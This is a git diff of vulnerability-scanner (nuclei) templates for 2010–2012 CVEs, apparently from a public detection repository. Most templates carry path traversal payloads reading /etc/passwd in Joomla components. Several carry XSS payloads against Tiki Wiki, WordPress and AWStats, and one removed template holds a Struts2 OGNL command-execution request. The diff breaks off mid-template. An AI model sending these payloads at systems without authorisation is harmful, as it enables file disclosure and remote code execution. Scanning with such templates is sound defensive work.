--git a/nuclei-templates/CVE-2010/cve-2010-1531.yaml b/nuclei-templates/CVE-2010/cve-2010-1531.yaml new file mode 100644 index 0000000000..d76282552f --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1531.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1531 + +info: + name: Joomla! Component redSHOP 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12054 + - https://www.cvedetails.com/cve/CVE-2010-1531 + - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt + - http://www.osvdb.org/63535 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1531 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/cve-2010-1532.yaml b/nuclei-templates/CVE-2010/cve-2010-1532.yaml new file mode 100644 index 0000000000..5f2d0e4a18 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1532.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1532 + +info: + name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12118 + - https://www.cvedetails.com/cve/CVE-2010-1532 + - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt + - http://www.securityfocus.com/bid/39348 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1532 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/cve-2010-1540.yaml b/nuclei-templates/CVE-2010/cve-2010-1540.yaml new file mode 100644 index 0000000000..50d5e1c02d --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1540.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1540 + +info: + name: Joomla! Component com_blog - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + reference: + - https://www.exploit-db.com/exploits/11625 + - https://www.cvedetails.com/cve/CVE-2010-1540 + - http://secunia.com/advisories/38777 + - http://www.securityfocus.com/bid/38530 + classification: + cve-id: CVE-2010-1540 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2010/cve-2010-1653.yaml b/nuclei-templates/CVE-2010/cve-2010-1653.yaml new file mode 100644 index 0000000000..737487cfd0 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1653.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1653 + +info: + name: Joomla! Component Graphics 1.0.6 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12430 + - https://www.cvedetails.com/cve/CVE-2010-1653 + - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt + - http://www.securityfocus.com/bid/39743 + classification: + cve-id: CVE-2010-1653 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1658.yaml b/nuclei-templates/CVE-2010/cve-2010-1658.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1658.yaml rename to nuclei-templates/CVE-2010/cve-2010-1658.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1714.yaml b/nuclei-templates/CVE-2010/cve-2010-1714.yaml new file mode 100644 index 0000000000..1dacc59f33 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1714.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1714 + +info: + name: Joomla! Component Arcade Games 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12168 + - https://www.cvedetails.com/cve/CVE-2010-1714 + - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt + - http://secunia.com/advisories/39413 + classification: + cve-id: CVE-2010-1714 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2010/cve-2010-1715.yaml b/nuclei-templates/CVE-2010/cve-2010-1715.yaml new file mode 100644 index 0000000000..a97738faf3 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1715.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1715 + +info: + name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12174 + - https://www.cvedetails.com/cve/CVE-2010-1715 + - http://www.osvdb.org/63659 + - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt + classification: + cve-id: CVE-2010-1715 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/nuclei-templates/CVE-2010/cve-2010-1718.yaml b/nuclei-templates/CVE-2010/cve-2010-1718.yaml new file mode 100644 index 0000000000..330a7e33cf --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1718.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1718 + +info: + name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12282 + - https://www.cvedetails.com/cve/CVE-2010-1718 + - http://secunia.com/advisories/39521 + - http://www.securityfocus.com/bid/39545 + classification: + cve-id: CVE-2010-1718 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/cve-2010-1871.yaml b/nuclei-templates/CVE-2010/cve-2010-1871.yaml new file mode 100644 index 0000000000..8f02fc1dd0 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1871.yaml @@ -0,0 +1,24 @@ +id: CVE-2010-1871 + +info: + name: JBoss Seam 2 Code Execution + author: medbsq + severity: high +# - https://www.cvebase.com/cve/2010/1871 +requests: + - method: GET + path: + - "{{BaseURL}}:8080/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie" + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and + matchers: + - type: word + words: + - "java.lang." + - "For input string: \"zie\"" + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1954.yaml b/nuclei-templates/CVE-2010/cve-2010-1954.yaml new file mode 100644 index 0000000000..67e4710e8c --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1954.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1954 + +info: + name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12287 + - https://www.cvedetails.com/cve/CVE-2010-1954 + - http://www.securityfocus.com/bid/39552 + - http://www.exploit-db.com/exploits/12287 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1954 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/cve-2010-1957.yaml b/nuclei-templates/CVE-2010/cve-2010-1957.yaml new file mode 100644 index 0000000000..fee775cfe3 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1957.yaml @@ -0,0 +1,33 @@ +id: CVE-2010-1957 + +info: + name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12235 + - https://www.cvedetails.com/cve/CVE-2010-1957 + - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1957 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/16 diff --git a/nuclei-templates/CVE-2010/cve-2010-1979.yaml b/nuclei-templates/CVE-2010/cve-2010-1979.yaml new file mode 100644 index 0000000000..3b1f768585 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1979.yaml @@ -0,0 +1,33 @@ +id: CVE-2010-1979 + +info: + name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12088 + - https://www.cvedetails.com/cve/CVE-2010-1979 + - http://secunia.com/advisories/39360 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1979 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2035.yaml b/nuclei-templates/CVE-2010/cve-2010-2035.yaml new file mode 100644 index 0000000000..25cefc0e1a --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2035.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2035 + +info: + name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34006 + - https://www.cvedetails.com/cve/CVE-2010-2035 + - http://www.securityfocus.com/bid/40244 + - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2035 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2045.yaml b/nuclei-templates/CVE-2010/cve-2010-2045.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-2045.yaml rename to nuclei-templates/CVE-2010/cve-2010-2045.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2259.yaml b/nuclei-templates/CVE-2010/cve-2010-2259.yaml new file mode 100644 index 0000000000..0d1cebd3bb --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2259.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2259 + +info: + name: Joomla! Component com_bfsurvey - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10946 + - https://www.cvedetails.com/cve/CVE-2010-2259 + - http://secunia.com/advisories/37866 + - http://www.exploit-db.com/exploits/10946 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2259 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2920.yaml b/nuclei-templates/CVE-2010/cve-2010-2920.yaml new file mode 100644 index 0000000000..67f0851855 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2920.yaml @@ -0,0 +1,33 @@ +id: CVE-2010-2920 + +info: + name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12120 + - https://www.cvedetails.com/cve/CVE-2010-2920 + - http://www.vupen.com/english/advisories/2010/1844 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2920 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-3426.yaml b/nuclei-templates/CVE-2010/cve-2010-3426.yaml new file mode 100644 index 0000000000..9a7401132f --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-3426.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-3426 + +info: + name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/14964 + - https://www.cvedetails.com/cve/CVE-2010-3426 + - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt + - http://www.exploit-db.com/exploits/14964 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3426 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-4239.yaml b/nuclei-templates/CVE-2010/cve-2010-4239.yaml deleted file mode 100644 index c2b4d8c476..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-4239.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-4239 - -info: - name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion - author: 0x_akoko - severity: critical - description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. - reference: - - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - - https://www.openwall.com/lists/oss-security/2010/11/22/9 - - https://security-tracker.debian.org/tracker/CVE-2010-4239 - - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2010-4239 - cwe-id: CWE-20 - tags: cve,cve2010,tikiwiki,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" - - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2011/cve-2011-1669.yaml b/nuclei-templates/CVE-2011/CVE-2011-1669.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-1669.yaml rename to nuclei-templates/CVE-2011/CVE-2011-1669.yaml diff --git a/nuclei-templates/CVE-2011/cve-2011-2780.yaml b/nuclei-templates/CVE-2011/CVE-2011-2780.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-2780.yaml rename to nuclei-templates/CVE-2011/CVE-2011-2780.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml b/nuclei-templates/CVE-2011/CVE-2011-4336.yaml deleted file mode 100644 index e66d9aed23..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2011-4336 - -info: - name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info - - https://seclists.org/bugtraq/2011/Nov/140 - remediation: Upgrade to a supported version. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2011-4336 - cwe-id: CWE-79 - tags: seclists,cve,cve2011,xss,tikiwiki - -requests: - - method: GET - path: - - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/cve-2011-4624.yaml b/nuclei-templates/CVE-2011/CVE-2011-4624.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-4624.yaml rename to nuclei-templates/CVE-2011/CVE-2011-4624.yaml diff --git a/nuclei-templates/CVE-2011/cve-2011-4336.yaml b/nuclei-templates/CVE-2011/cve-2011-4336.yaml new file mode 100644 index 0000000000..43736129ab --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-4336.yaml @@ -0,0 +1,41 @@ +id: CVE-2011-4336 + +info: + name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting + author: pikpikcu + severity: medium + description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 + - https://www.securityfocus.com/bid/48806/info + - https://seclists.org/bugtraq/2011/Nov/140 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 + remediation: Upgrade to a supported version. + tags: cve,cve2011,xss,tikiwiki + +requests: + - method: GET + path: + - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html + +# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/CVE-2011-5106.yaml b/nuclei-templates/CVE-2011/cve-2011-5106.yaml similarity index 100% rename from nuclei-templates/CVE-2011/CVE-2011-5106.yaml rename to nuclei-templates/CVE-2011/cve-2011-5106.yaml diff --git a/nuclei-templates/CVE-2012/CVE-2012-0392.yaml b/nuclei-templates/CVE-2012/CVE-2012-0392.yaml deleted file mode 100644 index 4058bcdd5b..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-0392.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2012-0392 - -info: - name: Apache Struts2 S2-008 RCE - author: pikpikcu - severity: critical - description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 - - http://www.exploit-db.com/exploits/18329 - - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html - - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393 - remediation: Developers should immediately upgrade to at least Struts 2.3.18. - classification: - cve-id: CVE-2012-0392 - tags: cve2012,apache,rce,struts,java,edb,cve - -requests: - - method: GET - path: - - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml b/nuclei-templates/CVE-2012/CVE-2012-0896.yaml deleted file mode 100644 index a862bf8c9a..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2012-0896 - -info: - name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access - author: daffainfo - severity: high - description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. - reference: - - https://packetstormsecurity.com/files/108631/ - - https://www.cvedetails.com/cve/CVE-2012-0896 - tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal - classification: - cve-id: CVE-2012-0896 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-1823.yaml b/nuclei-templates/CVE-2012/CVE-2012-1823.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-1823.yaml rename to nuclei-templates/CVE-2012/CVE-2012-1823.yaml diff --git a/nuclei-templates/CVE-2012/CVE-2012-1835.yaml b/nuclei-templates/CVE-2012/CVE-2012-1835.yaml deleted file mode 100644 index 2d121cbbde..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-1835.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2012-1835 - -info: - name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2012-1835 - - https://web.archive.org/web/20151001133311/http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html - - http://web.archive.org/web/20210615141436/https://www.securityfocus.com/bid/52986 - - https://www.htbridge.com/advisory/HTB23082 - classification: - cve-id: CVE-2012-1835 - tags: cve,cve2012,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-2371.yaml b/nuclei-templates/CVE-2012/CVE-2012-2371.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-2371.yaml rename to nuclei-templates/CVE-2012/CVE-2012-2371.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-3153.yaml b/nuclei-templates/CVE-2012/CVE-2012-3153.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-3153.yaml rename to nuclei-templates/CVE-2012/CVE-2012-3153.yaml diff --git a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml deleted file mode 100644 index 20a880c2bd..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2012-4253 - -info: - name: MySQLDumper 1.24.4 - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. - reference: - - https://www.exploit-db.com/exploits/37129 - - https://www.cvedetails.com/cve/CVE-2012-4253 - tags: cve,cve2012,lfi - classification: - cve-id: CVE-2012-4253 - -requests: - - method: GET - path: - - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4547.yaml b/nuclei-templates/CVE-2012/CVE-2012-4547.yaml deleted file mode 100644 index d156aed493..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4547.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2012-4547 - -info: - name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. - reference: - - https://www.exploit-db.com/exploits/36164 - - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 - - http://awstats.sourceforge.net/docs/awstats_changelog.txt - - http://openwall.com/lists/oss-security/2012/10/29/7 - classification: - cve-id: CVE-2012-4547 - tags: cve,cve2012,xss,awstats,edb - -requests: - - method: GET - path: - - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' - - 